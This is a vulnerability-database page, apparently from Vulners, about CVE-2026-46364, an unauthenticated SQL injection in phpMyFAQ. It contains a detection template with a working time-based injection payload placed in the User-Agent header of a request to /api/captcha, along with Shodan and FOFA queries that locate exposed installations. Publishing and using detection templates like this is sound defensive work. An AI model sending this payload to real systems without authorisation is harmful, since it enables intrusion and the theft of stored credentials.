| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2026-46364 | 15 May 202618:36 | – | attackerkb | |
| CVE-2026-46364 | 6 May 202620:49 | – | circl | |
| phpMyFAQ SQL注入漏洞 | 15 May 202600:00 | – | cnnvd | |
| CVE-2026-46364 | 15 May 202618:36 | – | cve | |
| CVE-2026-46364 phpMyFAQ - SQL Injection via User-Agent Header in BuiltinCaptcha | 15 May 202618:36 | – | cvelist | |
| EUVD-2026-30601 | 15 May 202618:36 | – | euvd | |
| phpMyFAQ has unauthenticated SQL injection via User-Agent header in BuiltinCaptcha | 6 May 202620:49 | – | github | |
| Duplicate Advisory: phpMyFAQ has unauthenticated SQL injection via User-Agent header in BuiltinCaptcha | 15 May 202621:31 | – | github | |
| CVE-2026-46364 | 15 May 202619:17 | – | nvd | |
| CVE-2026-46364 phpMyFAQ - SQL Injection via User-Agent Header in BuiltinCaptcha | 15 May 202618:36 | – | osv |
id: CVE-2026-46364
info:
name: phpMyFAQ <= 4.1.1 - SQL Injection
author: DhiyaneshDk
severity: critical
description: |
phpMyFAQ before 4.1.2 contains an unauthenticated SQL injection vulnerability in BuiltinCaptcha::garbageCollector() and BuiltinCaptcha::saveCaptcha() methods that interpolate unsanitized User-Agent headers into DELETE and INSERT queries. Unauthenticated attackers can exploit the public GET /api/captcha endpoint by crafting malicious User-Agent headers to perform time-based blind SQL injection, extracting sensitive data including user credentials, admin tokens, and SMTP credentials from the database.
impact: |
Unauthenticated attackers can extract sensitive data including user credentials, admin tokens, and SMTP credentials from the database.
remediation: |
Upgrade phpMyFAQ to version 4.1.2 or later.
reference:
- https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-289f-fq7w-6q2w
- https://www.phpmyfaq.de
- http://nvd.nist.gov/vuln/detail/CVE-2026-46364
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
epss-score: 0.01709
epss-percentile: 0.74567
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1194891278
fofa-query: app="phpMyFAQ"
tags: cve,cve2026,sqli,phpmyfaq
http:
- raw:
- |
@timeout: 20s
GET /api/captcha HTTP/1.1
Host: {{Hostname}}
User-Agent: x' OR SLEEP(8) OR 'x
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'status_code == 200'
- 'contains(body, "Truncated incorrect DOUBLE")'
condition: and
# digest: 4a0a0047304502205efa40e66623ad1c6b9564db319a2386c449aacd226d7ae1ea6971fae96d3fdb022100b8f0b721b3e3bfb9efc0f8fc828f3ee5397ae1cad93905d68c718aa7565f738f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation